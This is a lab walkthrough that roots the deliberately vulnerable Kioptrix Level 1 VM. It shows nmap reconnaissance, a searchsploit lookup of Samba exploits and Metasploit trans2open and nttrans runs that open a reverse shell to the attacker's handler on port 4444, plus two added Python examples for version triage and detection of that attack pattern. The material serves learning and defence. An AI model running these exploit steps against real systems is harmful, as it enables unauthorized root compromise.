Gaining root access with Metasploit
Let's crack Kioptrix Level 1, a virtual machine built with deliberately vulnerable software. We learn by doing.
Install Kioptrix 1
Download it from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/#
Configure the VM settings as follows:
Create a new virtual machine
- Set the OS to Linux - Ubuntu x64 (Press Next)
- Give it 1 GB RAM (Press Next)
- Select “Use existing virtual hard drive disk file” option and point it to the location where the Kioptrix .vmdk file is located (Press Create)
Once the VM is created, right-click it and choose “Settings”
- Go to ‘Storage’ section and remove the Kioptrix vmdk from “Controller: SATA” Storage tree.
- Add the Kioptrix .vmdk to ‘Controller:IDE’ Storage tree
- Go to “Network” section and select “Host-only Adapter” under “Attached to” drop-down menu.
- Expand the “Advanced” options and change your “Adapter Type” to “PCnet-PCI II (Am79C970A)”
Credits: https://www.reddit.com/r/netsecstudents/comments/72n2q2/kioptrix_level_11_vm_setup_problem/
Recon
root@kali:~# nmap 192.168.56.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-04 21:39 PST
Nmap scan report for 192.168.56.1
Host is up (0.00012s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 0A:00:27:00:00:00 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.000034s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:BC:B6:D7 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.103
Host is up (0.00011s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
32768/tcp open filenet-tms
MAC Address: 08:00:27:65:A7:4D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up (0.0000040s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
Nmap done: 256 IP addresses (4 hosts up) scanned in 9.48 seconds
The host at 192.168.56.103 is our target.
Let's fingerprint the service versions to see whether any of them has a known CVE.
root@kali:~# nmap -sSV --version-intensity 9 192.168.56.103
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-04 21:43 PST
Nmap scan report for 192.168.56.103
Host is up (0.000087s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
32768/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:65:A7:4D (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.37 seconds
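Reading a service scan by eye works for one host, but the same check is worth automating when you are reviewing your own exposure. The following is an added example (not part of the original post) that parses the nmap -sSV lines above, pulls out a product and its major.minor version, and flags release lines older than an assumed baseline. The thresholds in MIN_ACCEPTABLE are illustrative assumptions to tune to your own policy, not an authoritative EOL table. Note what it does with the Samba line: nmap reported no version at all, so the script marks it for manual fingerprinting rather than guessing, which is exactly the uncertainty that drives the trial-and-error in the Metasploit section below.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: the service lines from the nmap -sSV scan above.
SAMPLE_SCAN = """\
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
32768/tcp open status 1 (RPC #100024)
"""

# Assumed baseline: oldest (major, minor) release line still acceptable per product.
# Illustrative values only; replace with your organisation's supported-version policy.
MIN_ACCEPTABLE = {
    "OpenSSH": (7, 0),
    "Apache httpd": (2, 4),
    "OpenSSL": (1, 1),
    "Samba": (4, 0),
}

# One regex per product; groups 1 and 2 capture major and minor when present.
# The Samba pattern makes the version optional because nmap may omit it (as above).
PRODUCT_PATTERNS = {
    "OpenSSH": re.compile(r"OpenSSH[ /](\d+)\.(\d+)"),
    "Apache httpd": re.compile(r"Apache(?: httpd)?[ /](\d+)\.(\d+)"),
    "OpenSSL": re.compile(r"OpenSSL/(\d+)\.(\d+)"),
    "Samba": re.compile(r"Samba(?: smbd)?(?:[ /](\d+)\.(\d+))?"),
}

# "PORT STATE SERVICE VERSION" rows: port/proto, state, service name, free-text version.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_services(scan_text: str) -> List[Dict]:
    """Turn nmap's per-port rows into dicts; header and summary lines are skipped."""
    services = []
    for line in scan_text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue
        port, proto, state, name, version = m.groups()
        services.append({"port": int(port), "proto": proto, "state": state,
                         "service": name, "version": version})
    return services


def triage(scan_text: str) -> List[Tuple[int, str, str]]:
    """Return (port, product, verdict) for every recognised product in the scan.

    A banner can carry several products (the https row names both Apache and
    OpenSSL), so one port may yield more than one finding.
    """
    findings = []
    for svc in parse_services(scan_text):
        for product, pattern in PRODUCT_PATTERNS.items():
            m = pattern.search(svc["version"])
            if not m:
                continue
            if m.group(1) is None:
                verdict = "version not reported: fingerprint manually"
            else:
                found = (int(m.group(1)), int(m.group(2)))
                verdict = "legacy release line" if found < MIN_ACCEPTABLE[product] else "ok"
            findings.append((svc["port"], product, verdict))
    return findings


if __name__ == "__main__":
    for port, product, verdict in triage(SAMPLE_SCAN):
        print(f"{port:>5}  {product:<13} {verdict}")
```

On the sample scan every recognised product comes back as a legacy release line except Samba, which is flagged as unreported. The rpcbind and status rows produce no finding because no pattern claims them, which is the correct outcome for a triage script: silence means "not assessed", not "safe".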
Searching for CVE & exploits
Back on Kali, let's search for exploits related to Samba.
Samba is well known for exploitable bugs in its SMB/CIFS file-sharing implementation.
If you see an old Samba on a target, just try and pwn it.
root@kali:~# searchsploit samba
----------------------------------------------------------------------------- ---------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ---------------------------------------
GoSamba 1.0.1 - 'INCLUDE_PATH' Multiple Remote File Inclusions | exploits/php/webapps/4575.txt
Microsoft Windows XP/2003 - Samba Share Resource Exhaustion (Denial of Servi | exploits/windows/dos/148.sh
SWAT Samba Web Administration Tool - Cross-Site Request Forgery | exploits/cgi/webapps/17577.txt
Samba 1.9.19 - 'Password' Remote Buffer Overflow | exploits/linux/remote/20308.c
Samba 2.0.7 - SWAT Logfile Permissions | exploits/linux/local/20341.sh
Samba 2.0.7 - SWAT Logging Failure | exploits/unix/remote/20340.c
Samba 2.0.7 - SWAT Symlink (1) | exploits/linux/local/20338.c
Samba 2.0.7 - SWAT Symlink (2) | exploits/linux/local/20339.sh
Samba 2.0.x - Insecure TMP File Symbolic Link | exploits/linux/local/20776.c
Samba 2.0.x/2.2 - Arbitrary File Creation | exploits/unix/remote/20968.txt
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit) | exploits/osx/remote/9924.rb
Samba 2.2.2 < 2.2.6 - 'nttrans' Remote Buffer Overflow (Metasploit) (1) | exploits/linux/remote/16321.rb
Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit) | exploits/bsd_x86/remote/16880.rb
Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalat | exploits/linux/local/23674.txt
Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit) | exploits/linux_x86/remote/16861.rb
Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit) | exploits/osx_ppc/remote/16876.rb
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit) | exploits/solaris_sparc/remote/16330.rb
...
That's a lot. Let's filter down to the remote buffer overflows, which are the ones worth testing here.
root@kali:~# searchsploit samba | grep remote | grep Buffer
Samba 1.9.19 - 'Password' Remote Buffer Overflow | exploits/linux/remote/20308.c
Samba 2.2.2 < 2.2.6 - 'nttrans' Remote Buffer Overflow (Metasploit) (1) | exploits/linux/remote/16321.rb
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1) | exploits/unix/remote/22468.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2) | exploits/unix/remote/22469.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3) | exploits/unix/remote/22470.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4) | exploits/unix/remote/22471.txt
Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow | exploits/unix/remote/22356.c
Samba 2.2.x - Remote Buffer Overflow | exploits/linux/remote/7.pl
Samba 3.0.4 - SWAT Authorisation Buffer Overflow | exploits/linux/remote/364.pl
Sambar Server 6 - Search Results Buffer Overflow (Metasploit) | exploits/windows/remote/16756.rb
First attempt
Let's try the exploits/linux/remote/16321.rb exploit (the nttrans buffer overflow) first.
msfconsole
msf5 > search nttrans # search for the related exploit
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/samba/read_nttrans_ea_list normal No Samba read_nttrans_ea_list Integer Overflow
1 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
msf5 > use exploit/multi/samba/nttrans
msf5 exploit(multi/samba/nttrans) > set rhost 192.168.56.103
rhost => 192.168.56.103
msf5 exploit(multi/samba/nttrans) > exploit
[*] Started reverse TCP handler on 192.168.56.101:4444
[-] 192.168.56.103:139 - Exploit failed [timeout-expired]: Timeout::Error execution expired
[*] Exploit completed, but no session was created.
The exploit doesn't seem to work. Let's examine the details by double-checking the payload and the target.
msf5 exploit(multi/samba/nttrans) > show targets
Exploit targets:
Id Name
-- ----
0 Samba 2.2.x Linux x86
msf5 exploit(multi/samba/nttrans) > show options
Module options (exploit/multi/samba/nttrans):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.56.103 yes The target address range or CIDR identifier
RPORT 139 yes The target port (TCP)
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.101 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Samba 2.2.x Linux x86
The target is correct.
However, the payload doesn't seem to work. Let's switch to one of the generic payloads.
msf5 exploit(multi/samba/nttrans) > search payload -o all-payloads.txt
msf5 exploit(multi/samba/nttrans) > cat all-payloads.txt | grep tcp | grep generic
[*] exec: cat all-payloads.txt | grep tcp | grep generic
"496","payload/generic/shell_bind_tcp","","normal","No","Generic Command Shell, Bind TCP Inline"
"497","payload/generic/shell_reverse_tcp","","normal","No","Generic Command Shell, Reverse TCP Inline"
msf5 exploit(multi/samba/nttrans) > exploit
[*] Started reverse TCP handler on 192.168.56.101:4444
ls
[-] 192.168.56.103:139 - Exploit failed [timeout-expired]: Timeout::Error execution expired
[*] Exploit completed, but no session was created.
It still doesn't work even after changing the payload. Let's try another exploit.
Second attempt
Switch to the trans2open module, exploit/linux/samba/trans2open, and check its options:
msf5 exploit(linux/samba/trans2open) > show options
Module options (exploit/linux/samba/trans2open):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.56.103 yes The target address range or CIDR identifier
RPORT 139 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Samba 2.2.x - Bruteforce
msf5 exploit(linux/samba/trans2open) > exploit
[*] Started reverse TCP handler on 192.168.56.101:4444
[*] 192.168.56.103:139 - Trying return address 0xbffffdfc...
[*] 192.168.56.103:139 - Trying return address 0xbffffcfc...
[*] 192.168.56.103:139 - Trying return address 0xbffffbfc...
[*] 192.168.56.103:139 - Trying return address 0xbffffafc...
[*] Sending stage (985320 bytes) to 192.168.56.103
[*] Meterpreter session 1 opened (192.168.56.101:4444 -> 192.168.56.103:32769) at 2019-11-04 22:25:48 -0800
[*] 192.168.56.103 - Meterpreter session 1 closed. Reason: Died
[*] 192.168.56.103:139 - Trying return address 0xbffff9fc...
[*] Sending stage (985320 bytes) to 192.168.56.103
[*] Meterpreter session 2 opened (192.168.56.101:4444 -> 192.168.56.103:32770) at 2019-11-04 22:25:49 -0800
[*] 192.168.56.103 - Meterpreter session 2 closed. Reason: Died
[*] 192.168.56.103:139 - Trying return address 0xbffff8fc...
[*] Sending stage (985320 bytes) to 192.168.56.103
[*] 192.168.56.103 - Meterpreter session 3 closed. Reason: Died
[*] Meterpreter session 3 opened (127.0.0.1 -> 127.0.0.1) at 2019-11-04 22:25:50 -0800
[*] 192.168.56.103:139 - Trying return address 0xbffff7fc...
[*] Sending stage (985320 bytes) to 192.168.56.103
[*] Meterpreter session 4 opened (192.168.56.101:4444 -> 192.168.56.103:32772) at 2019-11-04 22:25:52 -0800
[*] 192.168.56.103 - Meterpreter session 4 closed. Reason: Died
[*] 192.168.56.103:139 - Trying return address 0xbffff6fc...
^C[-] 192.168.56.103:139 - Exploit failed [user-interrupt]: Interrupt
[-] exploit: Interrupted
msf5 exploit(linux/samba/trans2open) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf5 exploit(linux/samba/trans2open) > exploit
[*] Started reverse TCP handler on 192.168.56.101:4444
[*] 192.168.56.103:139 - Trying return address 0xbffffdfc...
[*] 192.168.56.103:139 - Trying return address 0xbffffcfc...
[*] 192.168.56.103:139 - Trying return address 0xbffffbfc...
[*] 192.168.56.103:139 - Trying return address 0xbffffafc...
[*] Command shell session 5 opened (192.168.56.101:4444 -> 192.168.56.103:32773) at 2019-11-04 22:26:47 -0800
ls
whoami
root
ifconfig
//bin/sh: ifconfig: command not found
pwd
/tmp
history
last
reboot system boot 2.4.7-10 Tue Nov 5 05:39 (00:48)
reboot system boot 2.4.7-10 Tue Nov 5 05:35 (00:51)
reboot system boot 2.4.7-10 Tue Nov 5 05:28 (00:59)
reboot system boot 2.4.7-10 Tue Nov 5 05:25 (01:02)
wtmp begins Tue Nov 5 05:25:06 2019
^C
Abort session 5? [y/N] y
""
[*] 192.168.56.103 - Command shell session 5 closed. Reason: User exit
Got it.
Sometimes an exploit only partly works. Look at the details (here the Meterpreter sessions kept opening and immediately dying, while the plain generic/shell_reverse_tcp payload stayed up) and make small adjustments until you get a stable session.
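The transcript above is also worth reading from the server's side. The trans2open module brute-forces a return address, so the target sees a burst of short-lived connections to TCP/139, each followed by a crashed smbd, and then the server itself opening an outbound connection back to the attacker's handler on TCP/4444 from an ephemeral port (32769, 32770, ...). The following is an added example (not part of the original post) of detection logic over constructed flow records modelled on that pattern: it flags any (server, peer) pair where the peer opened a burst of SMB connections inside a short window and the server then connected out to the same peer. The record format, the thresholds and the sample flows are assumptions for the example; the timestamps echo the session times on the page.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import List, NamedTuple, Optional


class Conn(NamedTuple):
    """One connection record: who opened a TCP connection to whom, and when."""
    ts: datetime
    src: str
    sport: int
    dst: str
    dport: int


def _t(hms: str) -> datetime:
    return datetime.strptime("2019-11-04 " + hms, "%Y-%m-%d %H:%M:%S")


# Constructed flow records (not taken from any real log): the attacker (.101)
# hammers TCP/139 on the server (.103) while the server calls back to the
# attacker's handler on TCP/4444, plus one benign SMB session from a workstation.
SAMPLE_FLOWS = [
    Conn(_t("22:25:47"), "192.168.56.101", 40001, "192.168.56.103", 139),
    Conn(_t("22:25:47"), "192.168.56.101", 40002, "192.168.56.103", 139),
    Conn(_t("22:25:48"), "192.168.56.101", 40003, "192.168.56.103", 139),
    Conn(_t("22:25:48"), "192.168.56.101", 40004, "192.168.56.103", 139),
    Conn(_t("22:25:48"), "192.168.56.103", 32769, "192.168.56.101", 4444),
    Conn(_t("22:25:49"), "192.168.56.101", 40005, "192.168.56.103", 139),
    Conn(_t("22:25:49"), "192.168.56.103", 32770, "192.168.56.101", 4444),
    Conn(_t("22:30:00"), "192.168.56.1", 50123, "192.168.56.103", 139),
]

# Ports on which a file server legitimately accepts SMB; it should rarely
# initiate connections of its own to a client that just spoke SMB to it.
SERVER_PORTS = {139, 445}


def detect_smb_exploit_pattern(flows: List[Conn], min_attempts: int = 4,
                               window: timedelta = timedelta(seconds=30)) -> List[dict]:
    """Flag (server, peer) pairs with a burst of SMB connections followed by a callback.

    Severity is "high" when the server connected back out to the peer after the
    burst began (a reverse-shell shape), otherwise "medium" (crash loop only).
    """
    inbound = defaultdict(list)
    for c in flows:
        if c.dport in SERVER_PORTS:
            inbound[(c.dst, c.src)].append(c.ts)

    alerts = []
    for (server, peer), stamps in inbound.items():
        stamps.sort()
        burst_start: Optional[datetime] = None
        # Sliding window: min_attempts connections whose first and last lie within `window`.
        for i in range(len(stamps) - min_attempts + 1):
            if stamps[i + min_attempts - 1] - stamps[i] <= window:
                burst_start = stamps[i]
                break
        if burst_start is None:
            continue
        callback = next((c for c in flows
                         if c.src == server and c.dst == peer and c.ts >= burst_start), None)
        alerts.append({
            "server": server,
            "peer": peer,
            "attempts": len(stamps),
            "burst_start": burst_start,
            "callback_port": callback.dport if callback else None,
            "severity": "high" if callback else "medium",
        })
    return alerts


if __name__ == "__main__":
    for a in detect_smb_exploit_pattern(SAMPLE_FLOWS):
        print(f"{a['severity'].upper()}: {a['peer']} -> {a['server']} "
              f"({a['attempts']} SMB connections from {a['burst_start']:%H:%M:%S}, "
              f"callback to port {a['callback_port']})")
```

On the sample data the attacker pair is reported as high severity with the callback port 4444, while the single workstation session produces nothing. The same shape works on conntrack, firewall or NetFlow exports once they are mapped onto Conn; the useful signal is the combination of a crash-loop burst and the server turning into a client, not either half on its own.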